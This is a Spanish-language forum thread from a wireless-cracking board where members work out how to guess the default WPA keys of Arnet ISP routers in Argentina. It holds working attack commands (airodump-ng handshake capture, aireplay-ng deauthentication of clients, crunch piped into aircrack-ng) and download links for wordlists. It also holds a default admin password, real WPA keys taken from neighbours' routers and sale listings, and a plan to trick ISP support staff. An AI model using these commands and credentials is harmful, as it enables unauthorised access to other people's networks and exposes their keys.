Arg-Wireless - El Primer Foro de Wireless de Argentina...

Seguridad Informática => Cracking Wireless => Mensaje publicado por: infolinuxar en 03 de Septiembre de 2012, 10:35:50 AM

Título: Crear Diccionario WPA para ARNET WPA
Publicado por: infolinuxar en 03 de Septiembre de 2012, 10:35:50 AM
(http://mla-d2-p.mlstatic.com/imperdible-oferta-modem-arnet-wifi-router-inalambrico-7025-MLA5151048960_102013-F.jpg)

Hola a todos es mi primer post en este foro, antes que nada los quiero felicitar por el sitio.
El motivo de este post es  para mi sorpresa de Arnet de venir usando  una clave tan simple y una encriptación WEP en sus modem/router  la cual era ARNET , Hoy me sorprendió  los equipos que entregan viene con clave WPA  la clave contiene  algo de 10 carácter y está impresa en  la  caja del modem/router, con letras y números las letras en minúscula, intente crackear con diccionarios  y generar un Wordlist pero esto  es imposible tarda muchísimo, necesitaría una súper com[El Usuario ha Insultado]dora.
Lo único que me queda es ver si se filtra algunas clave la otra seria ir posteando las clave que viene por defecto en los equipos y generar un  diccionarios  si les interesa podemos usar este mismo Post para ir, poniendo las claves de los equipos, no se me ocurre otra.....

Saludos a todos.




Modelos de Routers:

9C:D2:4B - ZTE Corporation
34:4B:50 - ZTE Corporation
38:46:08 - ZTE Corporation

08:7A:4C - Huawei Technologies Co., Ltd
78:6A:89 - Huawei Technologies Co., Ltd
EC:CB:30 - Huawei Technologies Co., Ltd
14:B9:68 - Huawei Technologies Co., Ltd

28:28:5D - ZyXEL Communications Corporation
FC:F5:28 - ZyXEL Communications Corporation
5C:f4:AB - ZyXEL Communications Corporation
50:67:F0 - ZyXEL Communications Corporation
EC:43:F6 - ZyXEL Communications Corporation

64:2D:AB - <no-se-sabe>
28:28:5C - <no-se-sabe>
3A:7B:C9 - <no-se-sabe>
48:9C:E7 - <no-se-sabe>
4C:AC:25 - <no-se-sabe>
94:85:73 - <no-se-sabe>
9C:C2:4B - <no-se-sabe>

F0:84:2F - ADB Broadband Italia
A4:52:6F - ADB Broadband Italia
74:88:8B - ADB Broadband Italia
00:8C:54 - ADB Broadband Italia
D4:D1:84 - ADB Broadband Italia
A4:5D:A1 - ADB Broadband Italia

38:22:9D - Pirelli Tyre S.p.A.

B4:82:FE - Askey Computer Corp




Historial:

15 de Mayo de 2013 - Primeros datos de posibles WPA's. 1 (http://arg-wireless.com.ar/index.php?topic=1006.msg5518#msg5518) 2 (http://arg-wireless.com.ar/index.php?topic=1006.msg5601#msg5601) 3 (http://arg-wireless.com.ar/index.php?topic=1006.msg5612#msg5612) 4 (http://arg-wireless.com.ar/index.php?topic=1006.msg5648#msg5648) 5 (http://arg-wireless.com.ar/index.php?topic=1006.msg5652#msg5652) 6 (http://arg-wireless.com.ar/index.php?topic=1006.msg5853#msg5853) 7 (http://arg-wireless.com.ar/index.php?topic=1006.msg5867#msg5867) 8 (http://arg-wireless.com.ar/index.php?topic=1006.msg5876#msg5876) 9 (http://arg-wireless.com.ar/index.php?topic=1006.msg5907#msg5907) 10 (http://arg-wireless.com.ar/index.php?topic=1006.msg6013#msg6013) 11 (http://arg-wireless.com.ar/index.php?topic=1006.msg6261#msg6261) 12 (http://arg-wireless.com.ar/index.php?topic=1006.msg6433#msg6433) 13 (http://arg-wireless.com.ar/index.php?topic=1006.msg6551#msg6551) 14 (http://arg-wireless.com.ar/index.php?topic=1006.msg6756#msg6756) 15 (http://arg-wireless.com.ar/index.php?topic=1006.msg6760#msg6760)
05 de Enero de 2015 - Liberado el algoritmo de ADB Pirelli de WIFI-Arnet (http://arg-wireless.com.ar/index.php?topic=1006.msg6766#msg6766)
09 de Enero de 2015 - Modificado el Script. You are not allowed to view links. Register or Login Download (http://arg-wireless.com.ar/index.php?topic=1006.msg6780#msg6780)
10 de Enero de 2015 - Compilado para Windows (http://arg-wireless.com.ar/index.php?topic=1006.msg6785#msg6785).
10 de Enero de 2015 - Nueva versión del Script (http://arg-wireless.com.ar/index.php?topic=1006.msg6786#msg6786). Compilado para Windows v1.1 (http://arg-wireless.com.ar/index.php?topic=1006.msg6789#msg6789)
11 de Enero de 2015 - Versión 1.2 del script liberada (http://arg-wireless.com.ar/index.php?topic=1006.msg6812#msg6812). Windows Version (http://arg-wireless.com.ar/index.php?topic=1006.msg6813#msg6813).

Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 03 de Septiembre de 2012, 01:27:47 PM
y habria q ver, muy bueno el dato de que viene en la caja del router; ya q eso indica q por alguna forna generan la clave; habria q verlo bien, pues aparte de venir sin wps activo es medio dificil saber como sacarlo.

un buen dato es que son simplemente 10 digitos segun comentan:
http://www.pcmasmas.com/viewtopic.php?f=2&t=35637&p=277403
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 03 de Septiembre de 2012, 10:55:02 PM
(http://www.adbglobal.com/medias/images/products/pdg_a4001n_revA/pdg_a4001n_reva_perspective_front.png)

Pocos datos por parte del vendedor.. http://www.adamscableequipment.com/uploads/2/6/7/4/2674188/adb_pdg_a4001n_modem_spec_sheet.pdf (http://www.adamscableequipment.com/uploads/2/6/7/4/2674188/adb_pdg_a4001n_modem_spec_sheet.pdf)

Aparte de tener 1036 = 1.000.000.000.000.000.000.000.000.000.000.000.000 (Posibles contraseñas..)
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 04 de Septiembre de 2012, 08:03:30 PM
por lo general el SSID es WiFi-Arnet-NNNN (N=Numeros) y las MAC Address un 90% son D4:D1:84:XX:XX:XX.

Los datos para su configuracion son:

IP: 192.168.1.1/admin.html
usuario: admin
contraseña: CalVxePV1!

Título: Re:Arnet con seguirdad WPA
Publicado por: Mosaiko en 06 de Septiembre de 2012, 03:30:17 AM
yo tengo 3 de esos modem, 2 en color blanco y uno en negro y las contraseñas por defecto son: 4 letras minusculas y 6 numeros no correlativos. Pero aun Asi los Wordlist creados son muy grandes.
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 06 de Septiembre de 2012, 01:09:22 PM
igual se achicaria vastante con saber si es que se respetan.. los lugares donde hay letras o numeros.. pasaria de unos 300gb a poco mas de 150gb como mucho..
Título: Re:Arnet con seguirdad WPA
Publicado por: Mosaiko en 06 de Septiembre de 2012, 09:38:57 PM
Aqui pongo en codigo del modem blanco de 2 antenas con seguridad WPA Por defecto: Este es El Codigo Original... El Aporte de cada uno de nosotros hace del exito colectivo. Saludos.
Contraseña: a1004n_a001_ab2_ae
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 06 de Septiembre de 2012, 10:36:56 PM
You are not allowed to view links. Register or Login
a1004n_a001_ab2_ae

You are not allowed to view links. Register or Login
las contraseñas por defecto son: 4 letras minusculas y 6 numeros no correlativos.

mmm.. ese es el modelo.. mmm.. mucha desconfianza.. jaja
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 02 de Noviembre de 2012, 01:33:21 PM
según me informaron la clave viene especificado detrás del equipo y consta de 9 dígitos y una letras posiblemente mayúscula.  123456789E.
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 08 de Noviembre de 2012, 10:30:06 PM
Algunas nuevas que he visto...

WiFi-Arnet-8231
WiFi-Arnet-aK62
WiFi-Arnet-07090
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 26 de Noviembre de 2012, 06:56:40 PM
Acabo de tomar un WPA Handshake de una "WiFi-Arnet-0X0X0".. vamos a ver que logramos!

Para capturar el WPA Handshake, simplemente hacemos en un terminal:

airodump-ng --bssid <MAC-AP> -c <Canal> -w output <Interfaz->

y luego en otro varias veces esperando un poco hasta que se obtenga el WPA Handshake en Airodump-ng:

aireplay-ng --deauth 10 -a <MAC-AP> -c <MAC-Cliente> <Interfazr>

Voy a realizar pruebas con un diccionario 000000000E-999999999E, (10GB)

Nada por parte de ese dic, seguramente cambia:

crunch 10 10 ABCDEFGHIJKLMNOPQRSTUVWXYZ -t %%%%%%%%%@

Pero serian 266GB.
Título: Re:Arnet con seguirdad WPA
Publicado por: lucaseo en 16 de Diciembre de 2012, 11:40:12 PM
You are not allowed to view links. Register or Login
Voy a realizar pruebas con un diccionario 000000000E-999999999E, (10GB)
Pasaste este diccionario? lograste sacar la clave? saludos!
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 17 de Diciembre de 2012, 12:54:57 AM
You are not allowed to view links. Register or Login
Pasaste este diccionario? lograste sacar la clave? saludos!

Lo deje trabajando unas 3 horas y me case, tardaba aprox. 24hs en pasarlo completo en windows.
Título: Re:Arnet con seguirdad WPA
Publicado por: ElPablo18 en 14 de Febrero de 2013, 02:02:11 AM
You are not allowed to view links. Register or Login
según me informaron la clave viene especificado detrás del equipo y consta de 9 dígitos y una letras posiblemente mayúscula.  123456789E.

i si creas un diccionario del  1 al 9  y una letra al final?
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 14 de Febrero de 2013, 02:20:33 AM
You are not allowed to view links. Register or Login
i si creas un diccionario del  1 al 9  y una letra al final?

ahí:

You are not allowed to view links. Register or Login
Nada por parte de ese dic, seguramente cambia:

crunch 10 10 ABCDEFGHIJKLMNOPQRSTUVWXYZ -t %%%%%%%%%@

Pero serian 266GB.
Título: Re:Arnet con seguirdad WPA
Publicado por: ElPablo18 en 14 de Febrero de 2013, 02:47:07 AM
no entiendo, nunca use crunch
Título: Re:Arnet con seguirdad WPA
Publicado por: ElPablo18 en 14 de Febrero de 2013, 03:29:16 AM
yo digo de crear un diccionario que sea con 9 numeros a lo primero y una letra en mayuscula a lo ultimo
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 14 de Febrero de 2013, 03:54:00 AM
Te bajas crunch para windows o para linux y ejecutas ese comando en el terminal|consola:

crunch 10 10 ABCDEFGHIJKLMNOPQRSTUVWXYZ -t %%%%%%%%%@

% = 0123456789 (Comenzara por en 000000000 al 999999999)
@ = ABCDEFGHIJKLMNOPQRSTUVWXYZ (Comenzara y le agregara una por una las letras.)
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 06 de Marzo de 2013, 01:13:22 PM
un dato:

Seriel: S120Y37042397
MAC: FCF582EC2B4X
WPA: AE5B2EBD29
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 06 de Marzo de 2013, 08:36:30 PM
Vamos a pensar que esa clave que copie de un router que estaba detrás del mismo es numérica y hexadecimal, tendríamos un diccionario de 10 dígitos con un peso de 4GB, respetando donde aparecen los números y las letras y todo en Mayúscula.

Con Crunch para crear el diccionario:
crunch 10 10 ABCDEF hex -o START -t @@%@%@@@%%

Ataque directo + AirCrack-ng:
crunch 10 10 ABCDEF hex -o -t @@%@%@@@%% | aircrack-ng -a 2 captura.cap -e nombre-de-la-red -b 11:22:33:44:55:66 -w -

Descarga Dic:
AA0A0AAA00-FF9F9FFF99.rar (16.2 MB)
https://mega.co.nz/#!7IQH0CCR!BRniI1MFF1oY2060Gg_RxT-spO4WFXynC8DkY0kTVCM
Título: Re:Arnet con seguirdad WPA
Publicado por: corbxyz en 09 de Marzo de 2013, 02:05:36 AM
No se si sea verdad, pero..

En este link http://www.taringa.net/posts/hazlo-tu-mismo/16420933/Modem-zte-zxhn-h108n.html (http://www.taringa.net/posts/hazlo-tu-mismo/16420933/Modem-zte-zxhn-h108n.html) un usuario dice que la contraseña son muchos numeros (?) y que la pass es HA8136914a...

Desafortunadamente no brinda datos sobre la MAC ni sobre el SSID.
Título: Re:Arnet con seguirdad WPA
Publicado por: D3M0N en 09 de Marzo de 2013, 01:33:01 PM
y eso dependerá del equipo, yo tuve uno de estos, el tema que no me dejaron conectarlo:

(http://content.buenacuerdo.com.ar/images/46/4689646595.jpg)

no era ese Zte que dice, era uno todo negro sin antena.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 16 de Marzo de 2013, 03:43:11 PM
estoy a punto de realizar una prueba con este dic haber que pasa.  :-[
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Grego en 30 de Marzo de 2013, 03:21:14 PM
Chicos, tratemos de aportar contraseñas de estas redes así adivinamos si cumplen un patrón. La que yo aporto es la siguiente: bsg223w5r3
La que aportaron antes que era HA8136914a no me la creo. No fue serió como lo posteo el chabon en taringa, fue como diciendo "y es más o menos así".
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 30 de Marzo de 2013, 03:56:26 PM
Como que no es muy parecida a la que vi..  :(

AE5B2EBD29
bsg223w5r3
Título: Router/Módem Arnet P.DG A4001N
Publicado por: hackeame_el_msn en 08 de Abril de 2013, 04:19:08 PM
Hola disculpen alguien tiene idea de cual es la contraseña wi-fi por defecto de estos router/modem nuevos que entrega arnet? solo pude saber googleando la contraseña del router,lei por ahi que son aleatorios las contraseñas  pero nose el patron.Alguien sabe algo de este router/modem? x favor si esto no va aca les pido que lo muevan a su seccion correspondiente muchas gracias  8)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 08 de Abril de 2013, 08:12:14 PM
@hackeame_el_msn: te muevo el tema al post dedicado a las WPA Arnet. Por ahora se tienen muy pocos datos, se sabe que es en algunos casos 10 dígitos.-
Título: Re:Arnet con seguirdad WPA
Publicado por: nyko513 en 19 de Abril de 2013, 06:04:56 PM
You are not allowed to view links. Register or Login
Lo deje trabajando unas 3 horas y me case, tardaba aprox. 24hs en pasarlo completo en windows.

D3M0N pasame el diccionario (o el comando en crunch para crearlo desde donde dejaste vos) y el .cap.. y lo termino de pasar! si queres.. saludos..
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: disanramon en 08 de Mayo de 2013, 09:55:45 PM
Muchachos hola. soy nuevo, pero quiero aportar una contraseña que saqué con Reaver (tenia WPS activado):
ESSID: WIFIHERRERA
WPA: 19500114HV
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: jgcastillos en 15 de Mayo de 2013, 03:32:25 PM
Clave que me vino en el router Zyxel de ARNET (hace 3 dias)

Red Wi-Fi:  WiFi-Arnet-936c
Clave:       9C36CBC3AA


Ahora me doy cuenta, que en mis alrededores hay una red que se llama WiFi-Arnet-147i


¿Alguien encontrón algo? Sirve lo que les pongo acá??
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 15 de Mayo de 2013, 08:38:24 PM
Por ahora podemos afirmar que las contraseñas están conformadas con 10 caracteres, comparando el que has aportado y el que he visto ambas contraseñas contienen 4 números y 6 caracteres, por lo general se podría probar un diccionario HEX de 10 dígitos.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: disanramon en 18 de Mayo de 2013, 11:20:45 PM
You are not allowed to view links. Register or Login
Por ahora podemos afirmar que las contraseñas están conformadas con 10 caracteres, comparando el que has aportado y el que he visto ambas contraseñas contienen 4 números y 6 caracteres, por lo general se podría probar un diccionario HEX de 10 dígitos.
Y de cuantos GBs estariamos hablando que pesaria ese diccionario Hex de 10 digitos amigo?
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 18 de Mayo de 2013, 11:38:43 PM
y 10GB según creo-
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: charlest0n en 30 de Mayo de 2013, 05:30:35 PM
Se me ocurre lo siguiente, aquellos que tengan Arnet con este router, llamar a atención al Cliente y decirle al de Soporte Técnico un chamuyo del estilo:

Hola, yo perdí la clave de Wifi que la tenía anotada en un papel y ahora no lo encuentro. Reinicie el router a configuración de fábrica, pero alguien borró la parte de la etiqueta donde estaba la contraseña, ¿cuál es la contraseña de fábrica de mi equipo?

Quizás allí soliciten algún dato en particular del equipo, y allí podemos ver si existe alguna relación funcional que nos permita buscar una ingeniería inversa. ¿Les parece viable?, saludos!

Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 30 de Mayo de 2013, 08:26:12 PM
Los de soporte ni saben que es un router.. jaja
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: charlest0n en 31 de Mayo de 2013, 12:00:34 AM
You are not allowed to view links. Register or Login
Los de soporte ni saben que es un router.. jaja

Jajaja, si eso a darlo por descontado. Pero alguna solución te tienen que dar, que no sea enviarte otro router.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: sebabasa en 02 de Junio de 2013, 01:31:11 PM
Nadie mas lo noto?

CitarRed Wi-Fi:  WiFi-Arnet-936c
Clave:       9C36CBC3AA

:o
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 02 de Junio de 2013, 06:20:41 PM
@sebabasa puede ser, pero justo en este caso solamente que tenga un parecido de dígitos el SSID con la contraseña.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 18 de Junio de 2013, 09:11:58 PM
Se me dio por buscar el mercadolibre el famoso router Zte que están entregando ahora, que viene con WPS activo pero es muy complicado de crackear pues el mismo se bloquea cada 10 intentos por aproximadamente unas 72hs.

(http://i.minus.com/ibhyAes8p8C2xn.jpg)
(http://i.minus.com/iT4yqT8AGarXr.jpg)

No tenemos detalle del pin expresado en el equipo pero podemos ver la clave WPA.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 18 de Junio de 2013, 09:42:55 PM
Analizando con mas profundidad podemos determinar que todas las claves WPA son de 10 digitos, mayormente numéricos de 7 a 9 caracteres.




Usuario y Contraseña Nuevos Modems/Routers Arnet (ADB A4001N y ZTE H108N )
Interfaz Arnet: http://192.168.1.1/
Interfaz Real: http://192.168.1.1/admin.html
Usuario: admin
Contraseña: CalVxePV1!
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 24 de Junio de 2013, 05:11:53 AM
Noticias, les traigo noticias!!!

A un amigo mio le instalaron el nuevo pack de Arnet Wi-Fi + ArnetPlay y como necesitaba internet me paso la contraseña y me encontré con:

(http://i.minus.com/ibMSBMqA04yeO.png)

Una serie de números similares al de las imágenes tomadas de mercadolibre. los datos de la red eran: WiFi-Arnet-LLNN y la contraseña era: LLL3456789, muy similar al de mercadolibre pero con la diferencia que uno comienza con 3 y termina con 9 y el otro comienza con 2 y termina con 8: LLL2345678.-

Ya con esto tenemos un indicio, pueda que sirva para algunas redes.

Referencias:
L = Letra Mayuscula.
N = Numero.

NOTA: La aplicación de Android se llama: "Recupera Contraseña WiFi (http://www.arg-wireless.com.ar/index.php/topic,1324.0.html)".




Otra similitud que encontré fue la siguiente:

Como habíamos hablado de la serie de números, esto tiene que ver con el SSID:

La de MercadoLibre:
SSID: WiFi-Arnet-7148
PASS: LLL2345678

La mia:
SSID: WiFi-Arnet-LLN9
PASS: LLL3456789




Les dejo los diccionarios:

Códigos de Crunch:
crunch 10 10 ABCDEFGHIJKLMNOPQRSTUVWXYZ hex -o START -t @@@2345678
crunch 10 10 abcdefghijklmnopqrstuvwxyz hex -o START -t @@@2345678
crunch 10 10 ABCDEFGHIJKLMNOPQRSTUVWXYZ hex -o START -t @@@3456789
crunch 10 10 abcdefghijklmnopqrstuvwxyz hex -o START -t @@@3456789


Packs para descargar:

DIC-MAYUS-ARNET-WPA.rar (1 KB)
https://mega.co.nz/#!iQJyHJaA!HUYsdWsjbbEHpWcuNTyX0kQk6noCV7sMCUxtaGcxQTo (https://mega.co.nz/#!iQJyHJaA!HUYsdWsjbbEHpWcuNTyX0kQk6noCV7sMCUxtaGcxQTo)

DIC-MINUS-ARNET-WPA.rar (1 KB)
https://mega.co.nz/#!WVpkATII!MRM5_UCw2JfDGO_UJ0xwiTBOQydaV6RCkQSQKB4e1Bo (https://mega.co.nz/#!WVpkATII!MRM5_UCw2JfDGO_UJ0xwiTBOQydaV6RCkQSQKB4e1Bo)
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: christian32 en 27 de Junio de 2013, 09:08:12 PM
Hola a todos.
Aporto los datos que encontre en mercado libre.

ZTE ZXHN H108N
WLAN SSID: WiFi-Arnet-WMC8
WLAN Security (WPA-PSK): cYOE999pK9

Pido disculpas porque no se si subi la foto correctamente, pero agrego la dirección donde se la puede ver.

http://articulo.mercadolibre.com.ar/MLA-463369693-modem-adsl-wi-fi-arnet-zte-zxhn-h108n-en-oferta-_JM

(http://bimg1.mlstatic.com/modem-adsl-wi-fi-arnet-zte-zxhn-h108n-en-oferta_MLA-F-3980202425_032013.jpg)

saludos.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: hackeame_el_msn en 04 de Julio de 2013, 06:07:14 PM
Ya no se que pensar  :( primero pense que el patron era 6 letras mayusculas y 4 numeros...despues veo contraseñas con esa caracteristica pero en ningun orden (osea aleatorio)... ahora una mezcla de mayusculas con minusculas...  ??? cual es el patron? alguien tiene una idea?   :'( supongo que por las mac's (primero 6 digitos) tendriamos que ver...si cumplen algun patron....las que tienen las mac's iguales (primeros 6 digitos) a ver si existe algun indicio.....de ultima habria que hacer ingenieria inversa a un modem de esta caracteristica para ver si trae un algoritmo de generacion de datos preconfigurados... he visto muchas redes que dejan por defecto los parametros pre-establecidos por su ISP (Wifi-Arnet-xxxx ) lo que da a pensar que con la contraseña tambien pasaria eso.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: christian32 en 17 de Julio de 2013, 08:50:21 PM
Continuo aportando mas datos que encontré en mercado libre.

ZTE ZXHN H108N
WLAN SSID: WiFi-Arnet-1841
WLAN Security (WPA-PSK): 1852852963
MAC: B4:B3:62:6D:E0.1A - B4:B3:62:6D:E0:20

http://articulo.mercadolibre.com.ar/MLA-461291367-mar-del-plata-modem-router-wi-fi-usb-zte-_JM (http://articulo.mercadolibre.com.ar/MLA-461291367-mar-del-plata-modem-router-wi-fi-usb-zte-_JM)

(http://bimg2.mlstatic.com/mar-del-plata-modem-router-wi-fi-usb-zte_MLA-F-4339857922_052013.jpg)

Lamentablemente la siguiente imagen tiene una pobre definición, los datos parecen ser:

ZTE ZXHN H108N
WLAN SSID: WiFi-Arnet-4703
WLAN Security (WPA-PSK): 5040372nl5
MAC: B4:74:2A:20:5D:FF - B4:74:2A:20:BE:05

http://articulo.mercadolibre.com.ar/MLA-457026287-modem-arnet-wifi-zte-zte-zxhn-h108n-nuevo-en-caja-sin-uso-_JM (http://articulo.mercadolibre.com.ar/MLA-457026287-modem-arnet-wifi-zte-zte-zxhn-h108n-nuevo-en-caja-sin-uso-_JM)

(http://img1.mlstatic.com/modem-arnet-wifi-zte-zte-zxhn-h108n-nuevo-en-caja-sin-uso_MLA-O-4146127433_042013.jpg)

Saludos.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 17 de Julio de 2013, 10:43:16 PM
Gracias por tu aporte @christian32, por ahora estamos a cada vez menos porcentaje de poder sacarla, pero sabemos básicamente como podría se la pass real.. no hay muchas que concuerden pero de apoco la vamos a ir sacando.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: Grueso Calibre en 17 de Julio de 2013, 11:14:04 PM
Hoy me topé con un router Zykel 1312 cuya clave por defecto era la siguiente:

11AC479T9H

Estos modelos son los que está poniendo ARNET en San Francisco.

Saludos.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: christian32 en 18 de Julio de 2013, 09:55:38 PM
Continuo aportando mas datos que encontré en mercado libre.

ZTE ZXHN H108N
WLAN SSID: WiFi-Arnet-F85q
WLAN Security (WPA-PSK): 639528417U
MAC: B4:74:2A:20:C6:99 - B4:74:2A:20:C6:9F

http://articulo.mercadolibre.com.ar/MLA-463754881-modem-adsl-wi-fi-arnet-zte-zxhn-h108-_JM (http://articulo.mercadolibre.com.ar/MLA-463754881-modem-adsl-wi-fi-arnet-zte-zxhn-h108-_JM)

(http://bimg1.mlstatic.com/modem-adsl-wi-fi-arnet-zte-zxhn-h108_MLA-F-4444311470_062013.jpg)

Saludos.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 18 de Julio de 2013, 10:37:59 PM
@christian32 ya teníamos ese patrón correspondiente, por ahora sabemos que el primero es NNNNNNNNNL (N = Numeros | L = Letras), el segundo que sabemos es LLLNNNNNNN (N = Numeros | L = Letras); los que se han repetido varias veces.
Título: Re:Crear Diccionario WPA para ARNET WPA
Publicado por: D3M0N en 14 de Agosto de 2013, 08:35:36 PM
Buenas, tuve la suerte de cruzarme uno de los routers nuevos de Arnet y tome este pequeño JS de su fuente:

MAC= 74:88:8B:07:AB:0E
WPS= 82435707 (No viene Activo)
WPA= 3c5xx646ak

<script language="javascript">
parent.document.getElementsByName("basefrm")[0].height="300";
<!-- hide
var unitNum = 0;
/*LegacyGuest*/
var ssid = 'WiFi-Arnet-5569';
var wlRefresh = '0';
var wepkey = "3c5xx";
var wpaPskKey = '3c5xx646ak';
var wep = 'disabled';
var wpa = 'aes';
var auth = '0';
var mode = 'psk';
var bit = '1';
var keys = "3c5xx";

if ( wlRefresh == '1' ) {
   var code = 'location="wlcfgrefresh_u.wl?wlRefresh=0"';
   eval(code);   
}

function print_help_text(){
   with ( document.forms[0] ){
      switch (wlType.selectedIndex){
        case 0:
            display_text="<br>";
            break;
        case 1:
            display_text="Para cambiar la contrase&ntilde;a deber&aacute;s elegir una</br> combinaci&oacute;n alfanum&eacute;rica con una longitud de 5 caracteres";
            break;
        case 2:
            display_text="Para cambiar la contrase&ntilde;a deber&aacute;s elegir una</br> combinaci&oacute;n alfanum&eacute;rica con una longitud de 13 caracteres";
            break;
        case 3:
        case 4:
        case 5:
            display_text="Para cambiar la contrase&ntilde;a deber&aacute;s elegir una</br> combinaci&oacute;n alfanum&eacute;rica con una longitud minima de 8 caracteres y m&aacute;xima de 63 caracteres";
            break;
        default:
            display_text="<br>";
            break;
      }
      display_text+="<br>";
      display_text+="<br>";
      document.getElementById('usertext').innerHTML=display_text;
   }
}

function frmLoad() {

   with ( document.forms[0] ) {
      wlSsid.value = ssid;
      if (mode=='shared')
      {
         if (wep=='enabled') {
            if (bit == 1) {
               wlType.selectedIndex = 1;
               wlpassword.size = 10;
               wlpassword.value = wepkey;
            } else {
              wlType.selectedIndex = 2;
              wlpassword.size = 15;
              wlpassword.value = wepkey;
            }
         }else{
            wlpassword.value = "";
            wlpassword.disabled = "disabled";
         }
      }
      else if(mode=='open')
         if (wep=='enabled') {
            if (bit == 1) {
               wlType.selectedIndex = 1;
               wlpassword.size = 10;
               wlpassword.value = wepkey;
            } else {
              wlType.selectedIndex = 2;
              wlpassword.size = 15;
              wlpassword.value = wepkey;
            }
         }else{
            wlpassword.value = "";
            wlpassword.disabled = "disabled";
         }
      else if (mode=="psk"){
         wlpassword.disabled=false;
         wlpassword.size = 32;
         wlpassword.value = wpaPskKey;
         if (wpa=="tkip")
             wlType.selectedIndex=3;
         else if (wpa=="aes")
             wlType.selectedIndex=4;
      } else if (mode=="psk2"){
         wlType.selectedIndex =5;
         wlpassword.disabled=false;
         wlpassword.size = 32;
         wlpassword.value = wpaPskKey;
      }else{
          wlType.selectedIndex = 0;
          wlpassword.disabled = "disabled";
      }
      print_help_text();
   }
}

function btnApply() {
   var loc = 'wlbasic.wl?';
   
   with ( document.forms[0] ) {
      loc += 'wlSsidIdx=0';
      loc += '&wlSsid=' + wlSsid.value;
      switch (wlType.selectedIndex)
      {
         case 1:
               if (wlpassword.value.length!=5){
               alert('La clave de seguridad WEP debe tener una longitud de 5 caracteres');
               return;
               }
           break;
         case 2:
               if (wlpassword.value.length!=13){
               alert('La clave de seguridad WEP debe tener una longitud de 13 caracteres');
               return;
               }
            break;
         case 3:
         case 4:
         case 5:
            if (wlpassword.value.length>=64 ||wlpassword.value.length<=7 ){
            alert('La clave de seguridad WPA debe tener una longitud minima de 8 y maxima de 63 caracteres');
            return;
            }
            break;
      }
      switch (wlType.selectedIndex)
      {
         case 0:
            loc += '&wlAuthMode=open';
            loc += '&wlAuth=0';
            loc += '&wlWep=disabled';
            break;
         case 1:
            loc += '&wlAuthMode=open';
            loc += '&wlAuth=0';
            loc += '&wlWep=enabled';
            loc += '&wlKeyBit=1';
            loc += '&wlKey1=' + encodeUrl(wlpassword.value);
            break;
         case 2:
            loc += '&wlAuthMode=open';
            loc += '&wlAuth=0';
            loc += '&wlWep=enabled';
            loc += '&wlKeyBit=0';
            loc += '&wlKey1=' + encodeUrl(wlpassword.value);
            break;
         case 3:
            loc += '&wlAuthMode=psk';
            loc += '&wlAuth=0';
            loc += '&wlWep=disabled';
            loc += '&wlWpaPsk=' + encodeUrl(wlpassword.value);
            loc += '&wlWpaGtkRekey=0';
            loc += '&wlKeyBit=1';
            loc += '&wlPreauth=1';
            loc += '&wlWpa=tkip';
            break;
         case 4:
            loc += '&wlAuthMode=psk';
            loc += '&wlAuth=0';
            loc += '&wlWep=disabled';
            loc += '&wlWpaPsk=' + encodeUrl(wlpassword.value);
            loc += '&wlWpaGtkRekey=0';
            loc += '&wlKeyBit=1';
            loc += '&wlPreauth=1';
            loc += '&wlWpa=aes';
            break;
         case 5:
            loc += '&wlAuthMode=psk2';
            loc += '&wlAuth=0';
            loc += '&wlWep=disabled';
            loc += '&wlWpaPsk=' + encodeUrl(wlpassword.value);
            loc += '&wlWpaGtkRekey=0';
            loc += '&wlKeyBit=1';
            loc += '&wlPreauth=1';
            loc += '&wlWpa=aes';
            break;
      }
   }
   loc += '&sessionKey=2032772992';
   var code = 'location="' + loc + '"';
   eval(code);
}

function wifiTypeSelected(){
   with ( document.forms[0] ) {
      switch (wlType.selectedIndex)
      {
         case 0:
            wlpassword.disabled="disabled";
            break;
         case 1:
            wlpassword.disabled=false;
            wlpassword.size=10;
            wlpassword.value=keys;
            break;
         case 2:
            wlpassword.disabled=false;
            wlpassword.size=15;
            wlpassword.value=keys;
            break;
         case 3:
            wlpassword.disabled=false;
            wlpassword.size=32;
            wlpassword.value=wpaPskKey;
            break;
         case 4:
            wlpassword.disabled=false;
            wlpassword.size=32;
            wlpassword.value=wpaPskKey;
         case 5:
            wlpassword.disabled=false;
            wlpassword.size=32;
